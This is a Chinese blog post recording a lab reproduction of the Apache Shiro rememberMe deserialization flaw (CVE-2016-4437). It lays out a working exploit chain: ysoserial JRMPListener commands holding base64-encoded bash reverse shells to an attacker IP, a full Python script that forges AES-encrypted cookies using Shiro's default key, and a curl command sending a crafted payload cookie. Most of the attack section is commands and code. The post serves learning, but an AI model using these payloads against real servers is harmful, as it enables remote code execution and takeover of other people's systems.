shiro反序列化

最新推荐文章于 2024-03-29 10:22:56 发布
最新推荐文章于 2024-03-29 10:22:56 发布
阅读量797 收藏 2
点赞数
分类专栏: java 文章标签: java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/drhrht/article/details/124343633
版权

shiro反序列化

CVE-2016-4437
服务器:192.168.43.127
攻击机:192.168.43.149

1 原理

shiro有记住密码的功能,密码是一段存储的cookie,其中shiro记住密码,功能就是下次登录不用再输入密码了,走了以下流程 反序列化-base64-aes加密,可以伪造一个带有bash反弹shell的cookie,流程暂定,还需要再次确认。

http://192.168.43.127:8080
样子
在这里插入图片描述
特征
在这里插入图片描述
burp-shiro插件也检测出来了key

在这里插入图片描述

2 复现方式

(1)使用现成的工具,一键利用,反弹shell
工具下载链接
目测dnslog可以成功,其他都不行
无需选择,自动跑
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
反弹shell,在kali机开启监听
在这里插入图片描述
在这里插入图片描述
kali接收到shell在这里插入图片描述

(2)使用反序列化,暂时不太成功,暂时拿不到反弹的shell,正在反思原因,反思后,问题解决,使用CommonsCollections6

  • java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjE0OS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-I}”
    bash往192.168.43.149弹shell
    在这里插入图片描述
  • python3 shiro.py 192.168.43.149:6666

在这里插入图片描述

  • 发送payload,200成功
    在这里插入图片描述

  • 弹回来shell
    在这里插入图片描述

发送cookie的curl方法,虽然是405,也可以弹回来shell
实际测试,即使不加/doLogin,直接给端口发也可以成功
curl -H “Cookie:rememberMe=dX3OOTh9SgeaquQwE0rhN5uE9GvMyuGHY212yGd+WfCLN2Wh7tj2bsFbYr4bFbxrQkuqNP8EKOuVImFxBSc+wdNP3jZprzQESs2rsfYt+EoIZ1PVES9ef43sC4CgC5hJXPUAVq2OWXmv+f6Nd1UV7AH8wtuN0frTWF1f6188Te3gQ5QZKAi3k5PF9RAFQMG5xWBhxr4UR/dX+aMZdcc4z5SdjoUX9qlGg3lnnUSjeAA+JT4akLH2QR7TTjYUu6XyDzOXLfgoZNzb1oVcj2bPDPZOguWdRfQ9j6lFa3TauxBUhx3qnUaixfo94hvNWITOE9EkC842B83IPEFAb4/t/CmJGJ7EiIv+RIjdE8EssPgtNZbuptdXKYkCMGmtDW4+i3Aa+pZ/enAJhTlOoJ6gIQ==” -I http://192.168.43.127:8080/doLogin

在这里插入图片描述
在这里插入图片描述

shiro.py的源码

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    print("encode_rememberMe={0}".format(payload.decode()))

在这里插入图片描述

3 待解决的问题

  • key是什么,作用是什么
  • cookie识别调用的过程
  • 生成cookie的代码是否可以自己写,其中网上错误的代码导致报错,原因是print少了一对括号,还是要有自己的判断能力。在这里插入图片描述

在这里插入图片描述

错误示范

  • kail使用ysoserial启一个1099端口
    那一段是bash反弹shell经过base64加密的代码,但是CommonsCollections4无法成功

    java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 “bash -c {echo,YmFzaCAtaSAgPiYgIC9kZXYvdGNwLzE5Mi4xNjguNDMuMTQ5Lzk5OTkgMD4mMQo=}|{base64,-d}|{bash,-i}”

在这里插入图片描述

4 参考链接

(1)https://xz.aliyun.com/t/9488			#反弹shell的其他形式
 (2) https://blog.csdn.net/m0_48520508/article/details/107770264?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522162079768016780269831639%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=162079768016780269831639&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-3-107770264.first_rank_v2_pc_rank_v29&utm_term=cve-2016-4437			#maven和ysoserial配置

在这里插入图片描述

drhrht
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java序列漏洞(ysoserial工具使用、shiro序列利用)
qq_50854662的博客
05-26 1702
Java序列漏洞(ysoserial工具使用、shiro序列利用)
shiro_attack工具-shiro序列漏洞的快速检测和利用
最新发布
weixin_59047731的博客
05-15 334
今天分享一个好用的渗透测试工具,主要是针对shiro框架漏洞的,它可以自动的爆破shiro密钥,同时可以写入大马,本人实战中觉得很好用!!!工具名称。
shiro序列漏洞修复(使用随机密钥)
m0_67400973的博客
03-28 2421
说明:shiro低版本使用固定默认密钥,有被攻击的风险,可以升级shiro版本,Apache官方已在1.2.5及以上版本中修复此漏洞,但是此方式有依赖冲突的风险。这里说说不升级版本的解决方案,这方案和官方的方案一样,都是使用生成的随机密钥 1、创建随机生成密钥工具 public class GenerateCipherKey { /** * 随机生成秘钥,参考org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNe
shiro序列漏洞工具的使用
qq_39511050的博客
11-30 1167
ShiroExploit.--shiro序列漏洞工具
shiro序列搭建、利用、复现、漏洞原理
芜湖~米汤来喽~
01-07 1276
Shiro框架下框架供了记住密码的功能(RememberMe)用户登陆成功后会生成一个经过加密的Cookie其Cookie的RememberMe的Value的值是经过序列、AES加密和base64编码后得到的结果。由于使用了AES加密,在Shiro1.2.4版本之前AES加密默认密钥的Base64编码值为kPH+bIxk5D2deZiIxcaaaA==,于是就可得到Payload的构造流程:恶意命令–>序列–>AES加密–>base64编码–>发送Cookie–>回显数据–>数据解码。
shiro序列脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
shiro序列复现.zip
08-03
shiro序列复现工具包;shiro序列复现工具包;
ShiroExp-1.3.1-all.jar shiro序列检测工具
01-12
ShiroExp-1.3.1-all.jar shiro序列检测工具 我这里是用于搭建攻防演练演示环境用
shiro序列工具,加强版
12-27
shiro序列工具,加强版
Shiro序列流量分析.pdf
05-10
PSRC 漏洞挖掘技术分享
java序列终极测试工具.zip
04-28
java序列终极工具,含有JBoss,websphere,weblogic等序列漏洞利用。
序列漏洞检查工具 Weblogic XML CVE-2017-10271
01-09
好用的Weblogic XML 序列漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
java序列漏洞工具AllInOne
01-05
java序列漏洞检测工具集 支持 jboss weblogic Websphere 本工具仅为方便管理员发现和展示漏洞的危害性,请勿用于非法用途
[Java序列]—Shiro序列(二)
snowlyzz的博客
12-06 523
shiro RCE利用
shiroshiro序列漏洞综合利用工具v2.2(下载、安装、使用)
yy1715713348的博客
03-29 1587
压箱底的好资料,全面地介绍网络安全的基础理论,包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等,将基础理论和主流工具的应用实践紧密结合,有利于读者理解各种主流工具背后的实现机制。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。客常用的开发软件都在这里了,给大家节省了很多时间。
java序列终极工具_检测java序列漏洞
weixin_28781243的博客
02-25 1962
java序列终极测试工具是一款检测java序列漏洞工具,直接将Jboss、Websphere和weblogic的序列漏洞的利用集成到了一起。java序列漏洞已经被曝出一段时间了,其强大的破坏力让我们防不胜防!有没有合理的方法扫描、解决这些漏洞呢?产生原因:在java编写的web应用与web服务器间java通常会发送大量的序列对象例如以下场景:HTTP请求中的参数,cookies以...
【漏洞复现】shiro 序列 (CVE-2016-4437)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-14 620
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。...
序列利用工具_Shiro序列漏洞利用汇总
weixin_42628280的博客
01-25 3987
“ Apache Shiro是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能。Shiro框架直观、易用,同时也能提供健壮的安全性。”文章目录:1、Shiro rememberMe序列漏洞(Shiro-550)1.1 漏洞原理1.2 影响版本1.3 漏洞特征1.4 漏洞利用1.4.1 利用方式一:弹shell1.4.2 利用方式二:写入文件2、Shiro Pa...
shiro序列检测
12-18
Shiro序列检测是指对Shiro框架可能存在的序列漏洞进行检测和防护的一种安全措施。通过该方法,可以防止黑客利用Shiro框架的序列漏洞进行攻击。 Shiro是Java领域中广泛使用的开源安全框架,用于认证、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值